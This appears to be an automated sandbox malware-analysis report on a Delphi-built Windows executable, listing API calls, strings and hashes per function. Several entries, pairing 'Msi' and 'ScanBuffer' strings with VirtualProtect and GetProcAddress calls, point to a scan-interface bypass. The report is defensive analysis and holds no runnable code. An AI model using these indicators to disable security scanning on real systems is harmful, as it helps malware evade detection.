                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F
                                                                            Strings
                                                                            • Software\Borland\Locales , xrefs: 00405EB0, 00405ECE
                                                                            • Software\Borland\Delphi\Locales , xrefs: 00405EEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de
                                                                            • Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RegisterAutomation , xrefs: 0045645E
                                                                            • dF , xrefs: 004566AD
                                                                            • vcltest3.dll , xrefs: 0045643D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RegisterAutomation$vcltest3.dll$dF
                                                                            • API String ID: 0-2619585711
                                                                            • Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7
                                                                            • Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB
                                                                            • VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5
                                                                            • VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB
                                                                            • FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8
                                                                            Strings
                                                                            • ScanBuffer , xrefs: 0045EF66
                                                                            • Msi , xrefs: 0045EF1F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect
                                                                            • String ID: Msi$ScanBuffer
                                                                            • API String ID: 2006266006-3561555771
                                                                            • Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785
                                                                            • Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00460656), ref: 004605EA
                                                                              • Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                              • Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                              • Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                              • Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • 4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                            • String ID: 4cC
                                                                            • API String ID: 3557136124-2099690512
                                                                            • Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c
                                                                            • Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(02EA8CCC,00466680,00000000,0045EED7), ref: 0045EE31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935
                                                                            • Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            • GetClassInfoA.USER32 ref: 00455993
                                                                            • RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C
                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3
                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA
                                                                            Strings
                                                                            • X5B , xrefs: 004559B8
                                                                            • Tn@ , xrefs: 0045597E
                                                                            • L0F , xrefs: 0045595D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                            • String ID: L0F$Tn@$X5B
                                                                            • API String ID: 2103932818-3306811505
                                                                            • Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
                                                                            • Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4
                                                                            • Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
                                                                            • Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                            • RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5
                                                                              • Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526
                                                                              • Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C
                                                                              • Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D
                                                                              • Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472
                                                                              • Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                              • Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487
                                                                              • Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7
                                                                              • Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                              • Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C
                                                                              • Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                              • Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • Delphi%.8X , xrefs: 00447906
                                                                            • 0sC , xrefs: 004479B1
                                                                            • ControlOfs%.8X%.8X , xrefs: 00447957
                                                                            • USER32 , xrefs: 00447A0E
                                                                            • AnimateWindow , xrefs: 00447A1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                            • String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                            • API String ID: 1515865724-1439261924
                                                                            • Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9
                                                                            • Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadIconA.USER32 ref: 004556D7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                            • OemToCharA.USER32 ref: 0045571C
                                                                            • CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                            • CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                              • Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993
                                                                              • Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                              • Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            Strings
                                                                            • 00F , xrefs: 004556CF, 00455701
                                                                            • MAINICON , xrefs: 004556CA
                                                                            • 80F , xrefs: 00455794
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                            • String ID: 00F$80F$MAINICON
                                                                            • API String ID: 2763768735-2155582179
                                                                            • Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d
                                                                            • Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            Strings
                                                                            • :mm , xrefs: 0040D2C5
                                                                            • :mm:ss , xrefs: 0040D2E2
                                                                            • mmmm d, yyyy , xrefs: 0040D18E
                                                                            • m/d/yy , xrefs: 0040D161
                                                                            • AMPM , xrefs: 0040D2A6
                                                                            • AMPM , xrefs: 0040D2B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 4232894706-2493093252
                                                                            • Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
                                                                            • Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77
                                                                            • Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
                                                                            • Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B
                                                                            • AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Strings
                                                                            • ScanString , xrefs: 00460A87
                                                                            • mssip32 , xrefs: 00460928
                                                                            • Msi , xrefs: 004608BA
                                                                            • DllRegisterServer , xrefs: 004608DF, 00460923
                                                                            • rrrrrrrtutFrk , xrefs: 004608A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc
                                                                            • String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk
                                                                            • API String ID: 1378522473-1273433984
                                                                            • Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a
                                                                            • Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetKeyboardLayout.USER32 ref: 0045441D
                                                                            • GetDC.USER32(00000000), ref: 00454472
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                            • ReleaseDC.USER32 ref: 00454487
                                                                            Strings
                                                                            • ,cF , xrefs: 0045449A
                                                                            • $BB , xrefs: 004544A5, 004544B7, 004544C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDeviceKeyboardLayoutRelease
                                                                            • String ID: $BB$,cF
                                                                            • API String ID: 3331096196-156580243
                                                                            • Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e
                                                                            • Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C26
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454C3C
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C75
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C8E
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454CB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                            • String ID:
                                                                            • API String ID: 2891467149-0
                                                                            • Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1
                                                                            • Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E
                                                                              • Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD
                                                                              • Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF
                                                                              • Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA
                                                                              • Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB
                                                                            Strings
                                                                            • Tahoma , xrefs: 0042AD50
                                                                            • MS Shell Dlg 2 , xrefs: 0042AD98
                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                            • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                            • API String ID: 2013942131-1011973972
                                                                            • Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd
                                                                            • Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetClassInfoA.USER32 ref: 00421801
                                                                            • UnregisterClassA.USER32 ref: 0042182A
                                                                            • RegisterClassA.USER32 ref: 00421834
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
